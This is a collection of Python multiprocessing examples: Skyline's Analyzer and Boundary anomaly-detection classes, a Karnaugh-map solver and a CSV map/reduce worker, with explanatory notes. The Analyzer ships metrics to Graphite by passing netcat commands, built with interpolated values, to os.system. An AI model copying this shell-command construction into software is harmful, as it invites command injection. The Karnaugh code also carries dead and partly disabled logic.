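
def worker(q, items):
    breakdown = defaultdict(int)
    for item in items:
        breakdown[item] += 1          # per-process tally
    for key, value in breakdown.items():
        q.put((key, value))           # hand the tally back to the parent

if __name__ == '__main__':
    q = Queue()
    chunks = [['mean', 'stddev', 'mean'], ['stddev', 'ks_test']]
    procs = [Process(target=worker, args=(q, chunk)) for chunk in chunks]
    for p in procs:
        p.start()
    for p in procs:
        p.join()

    totals = {}
    while True:
        try:
            key, value = q.get_nowait()
            totals[key] = totals.get(key, 0) + value
        except Empty:
            break
    print(totals)   # e.g. {'mean': 2, 'stddev': 2, 'ks_test': 1}

Joining before draining, as both the example and this sketch do, is only safe while the queued payload stays small; a worker that fills the queue's pipe buffer would block in put() and never exit.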
Example No. 45
class Analyzer(Thread):
    def __init__(self, parent_pid, storage):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.lock = Lock()
        self.exceptions = Manager().dict()
        self.anomaly_breakdown = Manager().dict()
        self.anomalous_metrics = Manager().list()
        self.storage = storage
        self.alerter = Alerter(storage)

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint, ts = run_selected_algorithm(timeseries)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name, ts]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except AttributeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Collate process-specific dicts to main dicts
        with self.lock:
            for key, value in anomaly_breakdown.items():
                if key not in self.anomaly_breakdown:
                    self.anomaly_breakdown[key] = value
                else:
                    self.anomaly_breakdown[key] += value

            for key, value in exceptions.items():
                if key not in self.exceptions:
                    self.exceptions[key] = value
                else:
                    self.exceptions[key] += value

    def send_mail(self, alert, metric):
        """
        Send an alert email to the appropriate recipient
        """
        msg = MIMEMultipart('alternative')
        msg['Subject'] = '[skyline alert] ' + metric[1]
        msg['From'] = settings.ALERT_SENDER
        msg['To'] = alert[1]
        link = '%s/render/?width=588&height=308&target=%s' % (settings.GRAPHITE_HOST, metric[1])
        body = 'Anomalous value: %s <br> Next alert in: %s seconds <a href="%s"><img src="%s"/></a>' % (metric[0], alert[2], link, link)
        msg.attach(MIMEText(body, 'html'))
        s = SMTP('127.0.0.1')
        s.sendmail(settings.ALERT_SENDER, alert[1], msg.as_string())
        s.quit()

    def run(self):
        """
        Called when the process initializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Send alerts
            #if settings.ENABLE_ALERTS:
            #    for alert in settings.ALERTS:
            #        for metric in self.anomalous_metrics:
            #            if alert[0] in metric[1]:
            #                try:
            #                    last_alert = self.redis_conn.get('last_alert.' + metric[1])
            #                    if not last_alert:
            #                        self.redis_conn.setex('last_alert.' + metric[1], alert[2], packb(metric[0]))
            #                        self.send_mail(alert, metric)
            #                except Exception as e:
            #                    logger.error("couldn't send alert: %s" % e)

            # Write anomalous_metrics to static webapp directory
            filename = path.abspath(path.join(path.dirname( __file__ ), '..', settings.ANOMALY_DUMP))
            with open(filename, 'w') as fh:
                # Make it JSONP with a handle_data() function
                anomalous_metrics = list(self.anomalous_metrics)
                anomalous_metrics.sort(key=operator.itemgetter(1))
                fh.write('handle_data(%s)' % anomalous_metrics)
            
            # process anomalous metrics
            for metric in self.anomalous_metrics:
                try:
                    last_save_key = 'last_save.%s.%s' % (metric[1], metric[2])
                    last_save = self.redis_conn.get(last_save_key)
                    if not last_save:
                        self.redis_conn.setex(last_save_key,
                            settings.SKIP_FREQUENCY, packb(metric[0]))
                        self.storage.save(metric)
                    if settings.ENABLE_ALERTS:
                        last_alert_key = 'last_alert.' + metric[1]
                        last_alert = self.redis_conn.get(last_alert_key)
                        if not last_alert:
                            self.redis_conn.setex(last_alert_key,
                                settings.SKIP_FREQUENCY, packb(metric[0]))
                            self.alerter.add(metric)
                except Exception as e:
                    logger.error("Failed processing anomaly, pid: %s, metric: %s, error: %s",
                        getpid(), metric[1], e)
            
            # send ready alerts
            if settings.ENABLE_ALERTS:
                try:
                    self.alerter.send_alerts()
                except Exception as e:
                    logger.error("Failed sending alerts, error: %s", e)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(self.exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % self.exceptions)
            logger.info('anomaly breakdown :: %s' % self.anomaly_breakdown)

            # Log to Graphite
            if settings.GRAPHITE_HOST != '':
                host = settings.GRAPHITE_HOST.replace('http://', '')
                system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host))
                system('echo skyline.analyzer.total_analyzed %d %s | nc -w 3 %s 2003' % ((len(unique_metrics) - sum(self.exceptions.values())), now, host))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                if settings.GRAPHITE_HOST != '':
                    host = settings.GRAPHITE_HOST.replace('http://', '')
                    system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host))
                    system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host))


            # Reset counters
            self.anomalous_metrics[:] = []
            self.exceptions = Manager().dict()
            self.anomaly_breakdown = Manager().dict()

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
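Example No. 45 takes the other route: shared Manager().dict() objects updated under an explicit Lock inside spin_process(). Below is a minimal sketch of that collation step; tally() and the sample chunks are illustrative only.

from collections import defaultdict
from multiprocessing import Lock, Manager, Process

def tally(shared, lock, items):
    local = defaultdict(int)
    for item in items:
        local[item] += 1
    with lock:                        # the read-modify-write below is not atomic
        for key, value in local.items():
            shared[key] = shared.get(key, 0) + value

if __name__ == '__main__':
    manager = Manager()
    shared = manager.dict()
    lock = Lock()
    chunks = [['Stale', 'Boring', 'Stale'], ['TooShort', 'Boring']]
    procs = [Process(target=tally, args=(shared, lock, chunk)) for chunk in chunks]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    print(dict(shared))   # e.g. {'Stale': 2, 'Boring': 2, 'TooShort': 1}

The proxy dict is process-safe per operation, but shared[key] = shared.get(key, 0) + value is two operations, which is why the lock is held around the whole merge.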
Example No. 46
class KarnaughMap(object):

    def __init__(self, n, MaxProcess=16384):

        #self.blocks = Manager().list()
        self.blocks = []
        self.kmap = {}
        self.kmapDCare = {}
        self.kmapValues = {}

        self.MaxProcess = MaxProcess
        print "MaxProcess %d" % MaxProcess
        self.completion = 0
        # Set number of variables
        self.numberOfVariables=n
        self.numberOfDCares=0
        # Determine width and height from n. of vars
        self.width=int(pow(2, ceil(n/2.0)))
        self.height=int(pow(2, floor(n/2.0)))

        # Fill map with 0s and clear the list of KarnaughNodes
        self.Reset()

        # Fill map kmapValues with values that each cell in the map
        # has. Look here for rules:
        # http://www.allaboutcircuits.com/vol_4/chpt_8/3.html
        if(self.numberOfVariables>2):
            for i in range(0,self.height):
                for j in range(0,self.width):
                    if(i%2 ==0 ):
                        self.kmapValues[(j, i)]=self.GrayEncode(j+((i)*self.width))
                    else:
                        self.kmapValues[(j, i)]=self.GrayEncode(self.width-1-j+((i)*self.width))
        else:
            if(self.numberOfVariables==2):

                self.kmapValues[(0, 0)]=0
                self.kmapValues[(1, 0)]=1
                self.kmapValues[(0, 1)]=2
                self.kmapValues[(1, 1)]=3

            if(self.numberOfVariables==1):

                self.kmapValues[(0, 0)]=0
                self.kmapValues[(1, 0)]=1




    def Reset(self):

        """ Fills map with zeros and deletes all nodes from the solution list """

        for i in range(0,self.height):
            for j in range(0,self.width):
                self.Set(j, i, 0 )
        self.blocks = Manager().list()


    def Solve(self, completion):

        """ Iterates through all possible ways that 'Don't cares' can be
        arranged, and finds one with fewest number of nodes in the solution
        (bestc). If there are more ways that give the same number of nodes
        in the solution choose the one with biggest nodes (bestsc) """

        best = []
        bestc=-1
        bestsc=0
        #for i in range(0, int(pow(2.0, self.numberOfDCares )) ):
        for i in range(0, 1 ):

            b = []
            j=i
            while j > 0:
                b.insert(0, j % 2)
                j = j // 2

            for j in range(len(b), self.numberOfDCares):
                b.insert(0, 0 )

            #self.blocks= Manager().list()
            self.blocks= []

            c=0
            for k in range(0, self.height):

                for l in range(0, self.width):

                    if(self.kmapDCare[(l, k)]==1):

                        self.kmap[(l, k)]=1
                        #if(b[c]==1):
                        #    self.kmap[(l, k)]=1
                        #else:
                        #     self.kmap[(l, k)]=0;
                        c += 1




            self.Solve2( completion )

            if( (bestc==-1) | (len(self.blocks)<=bestc) ):

                sc=0
                for iter in self.blocks:

                    for k in range(0,len(iter.values) ):
                        if(iter.values[k]==2):
                            sc += 1


                if( (bestc==-1) | (len(self.blocks)<bestc) ):

                    best=self.blocks
                    bestc=len(best)
                    bestsc=sc

                else:

                    if( sc>bestsc ):

                        best=self.blocks
                        bestc=len(best)
                        bestsc=sc




        self.blocks=best


    def Solve2(self, completion):

        def Join(a,i):
            CompBlocks = [block for block in blocks if self.IsJoinable(a.values, block.values )]
            for b in CompBlocks:
                x=self.IsJoinable(a.values, b.values )
                if(x>0):
                    #/* If they can be joined make a new block with 2 in the place
                    #of the one bit where a and b are different */
                    n = KarnaughNode()
                    n.numberOfItems=a.numberOfItems*2
                    n.flag = False
                    for j in range(0, len(a.values) ):

                        if(j!=(x-1)):
                            n.values.append(a.values[j] )
                        else:
                            n.values.append( 2 )

                    #/* Mark that a node is part of a larger node */
                    a.flag=True
                    b.flag=True

                    #/* Check if that block already exists in the list */
                    exist=False
                    for c in self.blocks:
                        if(n.values==c.values):
                            exist=True

                    if(not exist):
                        self.blocks.append(n )
        def CleanProcess():
            for process in ProcessList:
                process.join()

            for process in ProcessList:
                jn = resultQueue.get()
                for n in jn.newblocks:
                    exist = False
                    for c in self.blocks:
                        if(n.values==c.values):
                            exist=True
                    if(not exist):
                        self.blocks.append(n )
                for b in jn.removeblocks:
                    for c in self.blocks:
                        if(b.values==c.values):
                            self.blocks.remove(c)

        """ Check for special case that all cells in the map are the same """
        a=1
        for i in range(0,self.height):
            if(a==0):
                break
            for j in range(0,self.width):
                if( self.kmap[(j, i)]!=self.kmap[(0, 0)] ):
                    a=0
                    break
        if(a==1):

            #/* Clear the list so that all those nodes with one item are deleted */
            #self.blocks=Manager().list()
            self.blocks=[]

            # If there are only zeros in the map there's nothing to solve
            if (self.kmap[(0, 0)]==0):
                 return
            else:

                # If there are only ones, solution is one element as big as the map
                n=KarnaughNode()
                n.numberOfItems = self.width*self.height
                for j in range(0,self.numberOfVariables):
                    n.values.append( 2 )
                self.blocks.append(n )
                return



        #/* Put all blocks with 1 element in list */
        for i in range(0, self.height):

            for j in range(0, self.width):

                if(self.kmap[(j, i)]==1):

                    n=KarnaughNode()
                    n.numberOfItems=1
                    n.flag=False
                    n.values=self.GetMapBoolValue(j, i )
                    self.blocks.append(n )


        max = int(log(self.width*self.height )/log(2)+1)

        # Joining blocks into blocks with 2^i elements

        for sizeloop in range( 1, max ):
            #/* Check every block with every other block and see if they can be joined
            #into a bigger block */

            blocks = [block for block in self.blocks if (block.numberOfItems == pow(2.0, sizeloop-1)) ]
##            resultQueue = Queue()
            ProcessList = []
            for index, a in enumerate(blocks):
                self.completion = int((1.0*(index+1)/len(blocks)*1.0*1/max+(sizeloop-1.0)/max)*100)
                completion.value = self.completion
                Join(a,sizeloop)
##                processblocks = list(blocks)
##                process = JoinTask(self, processblocks , a, i)
##                ProcessList.append(process)
##                #process.run()
##                process.start()
##                while len(ProcessList) >= self.MaxProcess:
##                    for process in ProcessList:
##                        process.join(1)
##                        if not process.is_alive():
##                            ProcessList.remove(process)
##            while ProcessList:
##                for process in ProcessList:
##                    process.join(10)
##                    if not process.is_alive():
##                        ProcessList.remove(process)
##                    else:
##                        print 'wait for process ...' % process.name
            # Flag blocks that are included in other blocks
            a_blocks = [block for block in self.blocks if (block.flag==False and block.numberOfItems < pow(2.0, sizeloop)) ]
            for a_block in a_blocks:
                b_blocks = [block for block in self.blocks if (block!=a_block and block.numberOfItems > a_block.numberOfItems) ]
                for b_block in b_blocks:
                    flag_block = True
                    for index in range(len(b_block.values)):
                        if a_block.values[index] != b_block.values[index] and b_block.values[index] != 2:
                            flag_block = False
                            break
                    if flag_block:
                        self.blocks.remove(a_block)
                        break

            #/* Deletes nodes that are contained in larger nodes */
            blocks = [block for block in self.blocks if (block.flag==True) ]
            for a in blocks:
                self.blocks.remove(a)

        # Delete nodes that cover only Don't-care cells
        blocks = self.blocks
        for block in blocks:
            DCareblock = True
            for i in range(0,self.height):
                for j in range(0,self.width):
                    if(self.IsAtCell(j, i, block.values)):
                        if self.kmapDCare[(j, i)]!=1:
                            DCareblock = False
            if DCareblock:
                self.blocks.remove(block)

        #/* Deletes unneeded nodes. Draws a temp map with all nodes but one
        #and if that map is same as the main map, node that wasn't drawn can be deleted */

        temp = {}
        blocks = self.blocks
        for a in blocks:
            for i in range(0,self.height):
                for j in range(0,self.width):
                    temp[(j, i)]=0

            for b in blocks:
                if(a!=b):
                    for i in range(0,self.height):
                        for j in range(0,self.width):
                            if(self.IsAtCell(j, i, b.values)):
                                temp[(j, i)]=1
            del_var=1
            for i in range(0,self.height):
                for j in range(0,self.width):
                    if(temp[(j, i)]!=self.kmap[(j, i)]) and self.kmapDCare[(j, i)] != 1 :
                        del_var=0
                        break
                if(not del_var):
                    break
            if(del_var):
                self.blocks.remove(a )

    def IsAtCell(self,  x,  y,  a):

        b=self.GetMapBoolValue(x, y )
        for i in range(0, len(a) ):
            if( (a[i]!=b[i]) & (a[i]!=2) ): return 0
        return 1


    def GetMapBoolValue(self, x, y):

        b = []
        i=self.GetMapValue(x, y )
        while i > 0:
            b.insert(0, i % 2)
            i = i // 2

        for j in range(len(b), self.numberOfVariables):
            b.insert(0, 0 )
        return b


    def IsJoinable(self, a, b):
        """ Checks if 2 karnaugh nodes with values a and b are joinable (only differ in one bit),
        and if they are returns (place where they differ + 1), otherwise returns 0 """

        c=0
        for i in range(0,len(a)):

            if(a[i]!=b[i]):

                c += 1
                x=i
        if(c==1):
            return x+1
        else:
            return 0


    def GrayEncode(self, g):

        return int(g) ^ (int(g) >> 1 )



    def Set(self, x, y, value):

        self.kmap[(x, y)]=value
        if(value==2) :

            self.kmapDCare[(x, y)]=1
            self.numberOfDCares += 1

        else:
            self.kmapDCare[(x, y)]=0


    def Get(self, x, y):

        if(not self.kmapDCare[(x,y)]):
            return self.kmap[(x,y)]
        else:
            return 2


    def GetMapValue(self, x, y):

        return self.kmapValues[(x,y)]


    def GetWidth(self):

        return self.width


    def GetHeight(self):

        return self.height


    def GetSolutions(self):

        return self.blocks


    def GetNumberOfVars(self):

        return self.numberOfVariables
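The KarnaughMap class rests on two small helpers: GrayEncode(), which maps consecutive cell indices to codes differing in exactly one bit, and IsJoinable(), which only joins two blocks whose value vectors differ in a single position. A standalone illustration of both, outside the class:

def gray_encode(g):
    # Same formula as KarnaughMap.GrayEncode: consecutive integers map to
    # codes that differ in exactly one bit.
    return g ^ (g >> 1)

def is_joinable(a, b):
    # Same contract as KarnaughMap.IsJoinable: return (index + 1) of the single
    # differing position, or 0 if the vectors differ in zero or several places.
    diff = [i for i in range(len(a)) if a[i] != b[i]]
    return diff[0] + 1 if len(diff) == 1 else 0

print([gray_encode(g) for g in range(8)])   # [0, 1, 3, 2, 6, 7, 5, 4]
print(is_joinable([0, 1, 1], [0, 0, 1]))    # 2 -> joinable, bit 1 differs
print(is_joinable([0, 1, 1], [1, 0, 1]))    # 0 -> not joinable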
Example No. 47
class Worker(object):

    def __init__(self, fname, output_file):
        self.fname = fname
        self.split_files = None
        '''
        self.db_instance = Utility.tinydb_instance()
        '''
        self.undefined_list = Manager().list()
        self.defined_list = Manager().list()
        self.lines_to_be = 0
        self.output = {}
        self.opfile = output_file

    def data_process(self):
        """
        This method is to process the data. It will calculate the line count in file
        and split file based on line count. Now files are split to the number based on
        number of cores in machine.
        returns :Nothing
        """
        logging.info('Processing the data and split files')
        lines = Utility.file_len(self.fname)
        self.lines_to_be, self.split_files = Utility.split_files(self.fname, lines,
                                                                 cpu_count().real)

    def clean_json(self, line_no, row):
        """
        This method is for initial cleaning to reduce overhead from parser.
         Length of the Each line should be either 4 or 5 comma seperated
        :param line_no:  Line number from the file
        :param row: the document to process
        :return: Boolean
        """
        if len(row) not in [4, 5]:
            return False
        return True

    def parse_json(self, fname):
        """
        This is the core function. It will call ParseDoc object and parse each document
        The output is written to a shared memory list.
        :param fname:
        :return: Nothing
        """
        dp = DocProcess(fname, self.lines_to_be)
        dp.read_csv()
        parser_doc = ParseDoc()
        for line_no, row in dp.next():
            row_list = row.split(',')
            if self.clean_json(line_no, row_list):
                value = parser_doc.parse_machine(row_list)
                if value:
                    self.defined_list.append(value)
                else:
                    self.undefined_list.append(line_no)
            else:
                self.undefined_list.append(line_no)

    def mapper(self):
        workers = []
        for s_file in self.split_files:
            worker_process = Process(target=self.parse_json, args=(s_file, ))
            workers.append(worker_process)
            worker_process.start()

        [worker.join() for worker in workers]

    def reducer(self):
        self.output["entries"] = list(self.defined_list)
        self.output["errors"] = list(self.undefined_list)

        self.output["errors"].sort()
        new_list = sorted(self.output["entries"], key=itemgetter('lastname'))
        self.output["entries"] = new_list

        with open(self.opfile, 'w') as f:
            pprint.pprint(self.output, f, indent=2)

    def run(self):
        self.mapper()
        self.reducer()
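Example No. 47 follows a simple map/reduce shape: split the input file, let each process append parsed rows and error line numbers to shared Manager().list()s, then sort and merge in the parent. A compact sketch of that shape follows; parse_chunk() and the sample rows are illustrative, not the original ParseDoc parser.

from multiprocessing import Manager, Process
from operator import itemgetter

def parse_chunk(rows, parsed, errors):
    for line_no, row in rows:
        fields = row.split(',')
        if len(fields) in (4, 5):     # same length check as Worker.clean_json
            parsed.append({'lastname': fields[0].strip(), 'line': line_no})
        else:
            errors.append(line_no)

if __name__ == '__main__':
    manager = Manager()
    parsed, errors = manager.list(), manager.list()
    rows = [(1, 'Smith, John, 123 Road, 55555'),
            (2, 'broken line'),
            (3, 'Adams, Ada, 9 Lane, 11111, x')]
    chunks = [rows[:2], rows[2:]]     # stand-in for Utility.split_files
    procs = [Process(target=parse_chunk, args=(c, parsed, errors)) for c in chunks]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    output = {'entries': sorted(parsed, key=itemgetter('lastname')),
              'errors': sorted(errors)}
    print(output)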
Example No. 48
class Boundary(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Boundary
        """
        super(Boundary, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.boundary_metrics = Manager().list()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def unique_noHash(self, seq):
        seen = set()
        return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

    # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True
    # for dumping the metric timeseries data into for debugging purposes
    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        except OSError as exc:
            # Python >2.5
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def spin_process(self, i, boundary_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Determine assigned metrics
        bp = settings.BOUNDARY_PROCESSES
        bm_range = len(boundary_metrics)
        keys_per_processor = int(ceil(float(bm_range) / float(bp)))
        if i == settings.BOUNDARY_PROCESSES:
            assigned_max = len(boundary_metrics)
        else:
            # This is a skyline bug: the original skyline code uses 1 as the
            # beginning position of the index, but Python indices begin with 0.
            # assigned_max = len(boundary_metrics)
            # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014
            # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment
            assigned_max = min(len(boundary_metrics), i * keys_per_processor)
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys]
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: printing assigned_metrics_and_algos')
            for assigned_metric_and_algo in assigned_metrics_and_algos:
                logger.info('debug :: assigned_metric_and_algo - %s' % str(assigned_metric_and_algo))

        # Compile assigned metrics
        assigned_metrics = []
        for i in assigned_metrics_and_algos:
            assigned_metrics.append(i[0])

        # unique unhashed things
        def unique_noHash(seq):
            seen = set()
            return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

        unique_assigned_metrics = unique_noHash(assigned_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: unique_assigned_metrics - %s' % str(unique_assigned_metrics))
            logger.info('debug :: printing unique_assigned_metrics:')
            for unique_assigned_metric in unique_assigned_metrics:
                logger.info('debug :: unique_assigned_metric - %s' % str(unique_assigned_metric))

        # Check if this process is unnecessary
        if len(unique_assigned_metrics) == 0:
            return

        # Multi get series
        try:
            raw_assigned = self.redis_conn.mget(unique_assigned_metrics)
        except:
            logger.error('error :: failed to mget assigned_metrics from redis')
            return

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Reset boundary_algorithms
        all_boundary_algorithms = []
        for metric in BOUNDARY_METRICS:
            all_boundary_algorithms.append(metric[1])

        # The unique algorithms that are being used
        boundary_algorithms = unique_noHash(all_boundary_algorithms)
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: boundary_algorithms - %s' % str(boundary_algorithms))

        discover_run_metrics = []

        # Distill metrics into a run list
        for i, metric_name in enumerate(unique_assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: unpacking timeseries for %s - %s' % (metric_name, str(i)))
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
            except Exception as e:
                exceptions['Other'] += 1
                logger.error('error :: redis data error: ' + traceback.format_exc())
                logger.error('error :: %s' % e)

            base_name = metric_name.replace(FULL_NAMESPACE, '', 1)

            # Determine the metrics BOUNDARY_METRICS metric tuple settings
            for metrick in BOUNDARY_METRICS:
                CHECK_MATCH_PATTERN = metrick[0]
                check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                pattern_match = check_match_pattern.match(base_name)
                metric_pattern_matched = False
                if pattern_match:
                    metric_pattern_matched = True
                    algo_pattern_matched = False
                    for algo in boundary_algorithms:
                        for metric in BOUNDARY_METRICS:
                            CHECK_MATCH_PATTERN = metric[0]
                            check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                            pattern_match = check_match_pattern.match(base_name)
                            if pattern_match:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: metric and algo pattern MATCHED - " + metric[0] + " | " + base_name + " | " + str(metric[1]))
                                metric_expiration_time = False
                                metric_min_average = False
                                metric_min_average_seconds = False
                                metric_trigger = False
                                algorithm = False
                                algo_pattern_matched = True
                                algorithm = metric[1]
                                try:
                                    if metric[2]:
                                        metric_expiration_time = metric[2]
                                except:
                                    metric_expiration_time = False
                                try:
                                    if metric[3]:
                                        metric_min_average = metric[3]
                                except:
                                    metric_min_average = False
                                try:
                                    if metric[4]:
                                        metric_min_average_seconds = metric[4]
                                except:
                                    metric_min_average_seconds = 1200
                                try:
                                    if metric[5]:
                                        metric_trigger = metric[5]
                                except:
                                    metric_trigger = False
                                try:
                                    if metric[6]:
                                        alert_threshold = metric[6]
                                except:
                                    alert_threshold = False
                                try:
                                    if metric[7]:
                                        metric_alerters = metric[7]
                                except:
                                    metric_alerters = False
                            if metric_pattern_matched and algo_pattern_matched:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: added metric - %s, %s, %s, %s, %s, %s, %s, %s, %s' % (str(i), metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, algorithm))
                                discover_run_metrics.append([i, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm])

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: printing discover_run_metrics')
            for discover_run_metric in discover_run_metrics:
                logger.info('debug :: discover_run_metrics - %s' % str(discover_run_metric))
            logger.info('debug :: build unique boundary metrics to analyze')

        # Determine the unique set of metrics to run
        run_metrics = unique_noHash(discover_run_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: printing run_metrics')
            for run_metric in run_metrics:
                logger.info('debug :: run_metrics - %s' % str(run_metric))

        # Distill timeseries strings and submit to run_selected_algorithm
        for metric_and_algo in run_metrics:
            self.check_if_parent_is_alive()

            try:
                raw_assigned_id = metric_and_algo[0]
                metric_name = metric_and_algo[1]
                base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                metric_expiration_time = metric_and_algo[2]
                metric_min_average = metric_and_algo[3]
                metric_min_average_seconds = metric_and_algo[4]
                metric_trigger = metric_and_algo[5]
                alert_threshold = metric_and_algo[6]
                metric_alerters = metric_and_algo[7]
                algorithm = metric_and_algo[8]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: unpacking timeseries for %s - %s' % (metric_name, str(raw_assigned_id)))

                raw_series = raw_assigned[metric_and_algo[0]]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: unpacked OK - %s - %s' % (metric_name, str(raw_assigned_id)))

                autoaggregate = False
                autoaggregate_value = 0

                # Determine if the namespace is to be aggregated
                if BOUNDARY_AUTOAGGRERATION:
                    for autoaggregate_metric in BOUNDARY_AUTOAGGRERATION_METRICS:
                        autoaggregate = False
                        autoaggregate_value = 0
                        CHECK_MATCH_PATTERN = autoaggregate_metric[0]
                        base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            autoaggregate = True
                            autoaggregate_value = autoaggregate_metric[1]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: BOUNDARY_AUTOAGGRERATION passed - %s - %s' % (metric_name, str(autoaggregate)))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info(
                        'debug :: analysing - %s, %s, %s, %s, %s, %s, %s, %s, %s, %s' % (
                            metric_name, str(metric_expiration_time),
                            str(metric_min_average),
                            str(metric_min_average_seconds),
                            str(metric_trigger), str(alert_threshold),
                            metric_alerters, autoaggregate,
                            autoaggregate_value, algorithm)
                    )
                    # Dump the timeseries data to a file
